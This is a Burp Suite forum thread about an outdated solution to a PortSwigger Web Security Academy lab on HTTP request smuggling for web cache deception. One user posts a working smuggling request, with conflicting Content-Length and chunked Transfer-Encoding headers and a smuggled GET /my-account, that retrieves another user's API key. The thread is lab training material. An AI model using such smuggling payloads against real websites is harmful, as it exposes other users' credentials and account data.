Burp Suite User Forum

Login to post

Lab: Exploiting HTTP request smuggling to perform web cache deception (Solution incorrect)

| Last updated: Nov 26, 2019 06:57AM UTC

The solution for Lab: Exploiting HTTP request smuggling to perform web cache deception is INCORRECT. The Lab appears to be updated and is not using the /apiKey function anymore. Instead it is replaced with /my-account which has an update email address function /my-account/change-email. I have tried the original solution, and changed the /apiKey with /my-account. I have also tried using a double carriage-return after the X-Ignore: X, which produces some interesting results. However, I cannot for the life of me solve the updated solution. Please help or update the Solution appropriately.

Burp User | Last updated: Nov 26, 2019 07:06AM UTC

Also, not sure if this is an issue, the GET /academyLabHeader HTTP/1.1 is returning a HTTP/1.1 404 Not Found

Burp User | Last updated: Nov 26, 2019 07:49AM UTC

OK - I finally solved, but I am not sure it is the "intended" way. I used the following with no success for ages. POST / HTTP/1.1 Host: xxx-your-lab-id-xxx.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 42 Transfer-Encoding: chunked 0 GET /my-account HTTP/1.1 X-Ignore: X I then added 3 additional CRLF after the X-Ignore: X and submitted several times. This definitely caused the request to be smuggled and caused some interesting results. I then reverted back to the above request and submitted several times in Repeater. It was the Repeater results in the Burp Search for "POST /" that eventually returned the API Key....wierd! Other people have reported that refreshing the /login page might work and return the results in the /resources/css/labs.css although that did not work for me.

Ben, PortSwigger Agent | Last updated: Nov 26, 2019 09:15AM UTC

Hi Andrew, Thank you for your message. You are correct. We have recently changed some of the Web Academy infrastructure and the solutions are slightly out of sync with the changes that have been made. We are working hard to provide updates to the listed solutions but this will take some time. I was able to complete the lab by changing the smuggled GET request to use my-account instead of apiKey so that should work. It is also worth noting that the solutions provided are only one way of completing the labs so you should feel free to experiment with other approaches to see if they also work.

You need to Log in to post a reply. Or register here, for free.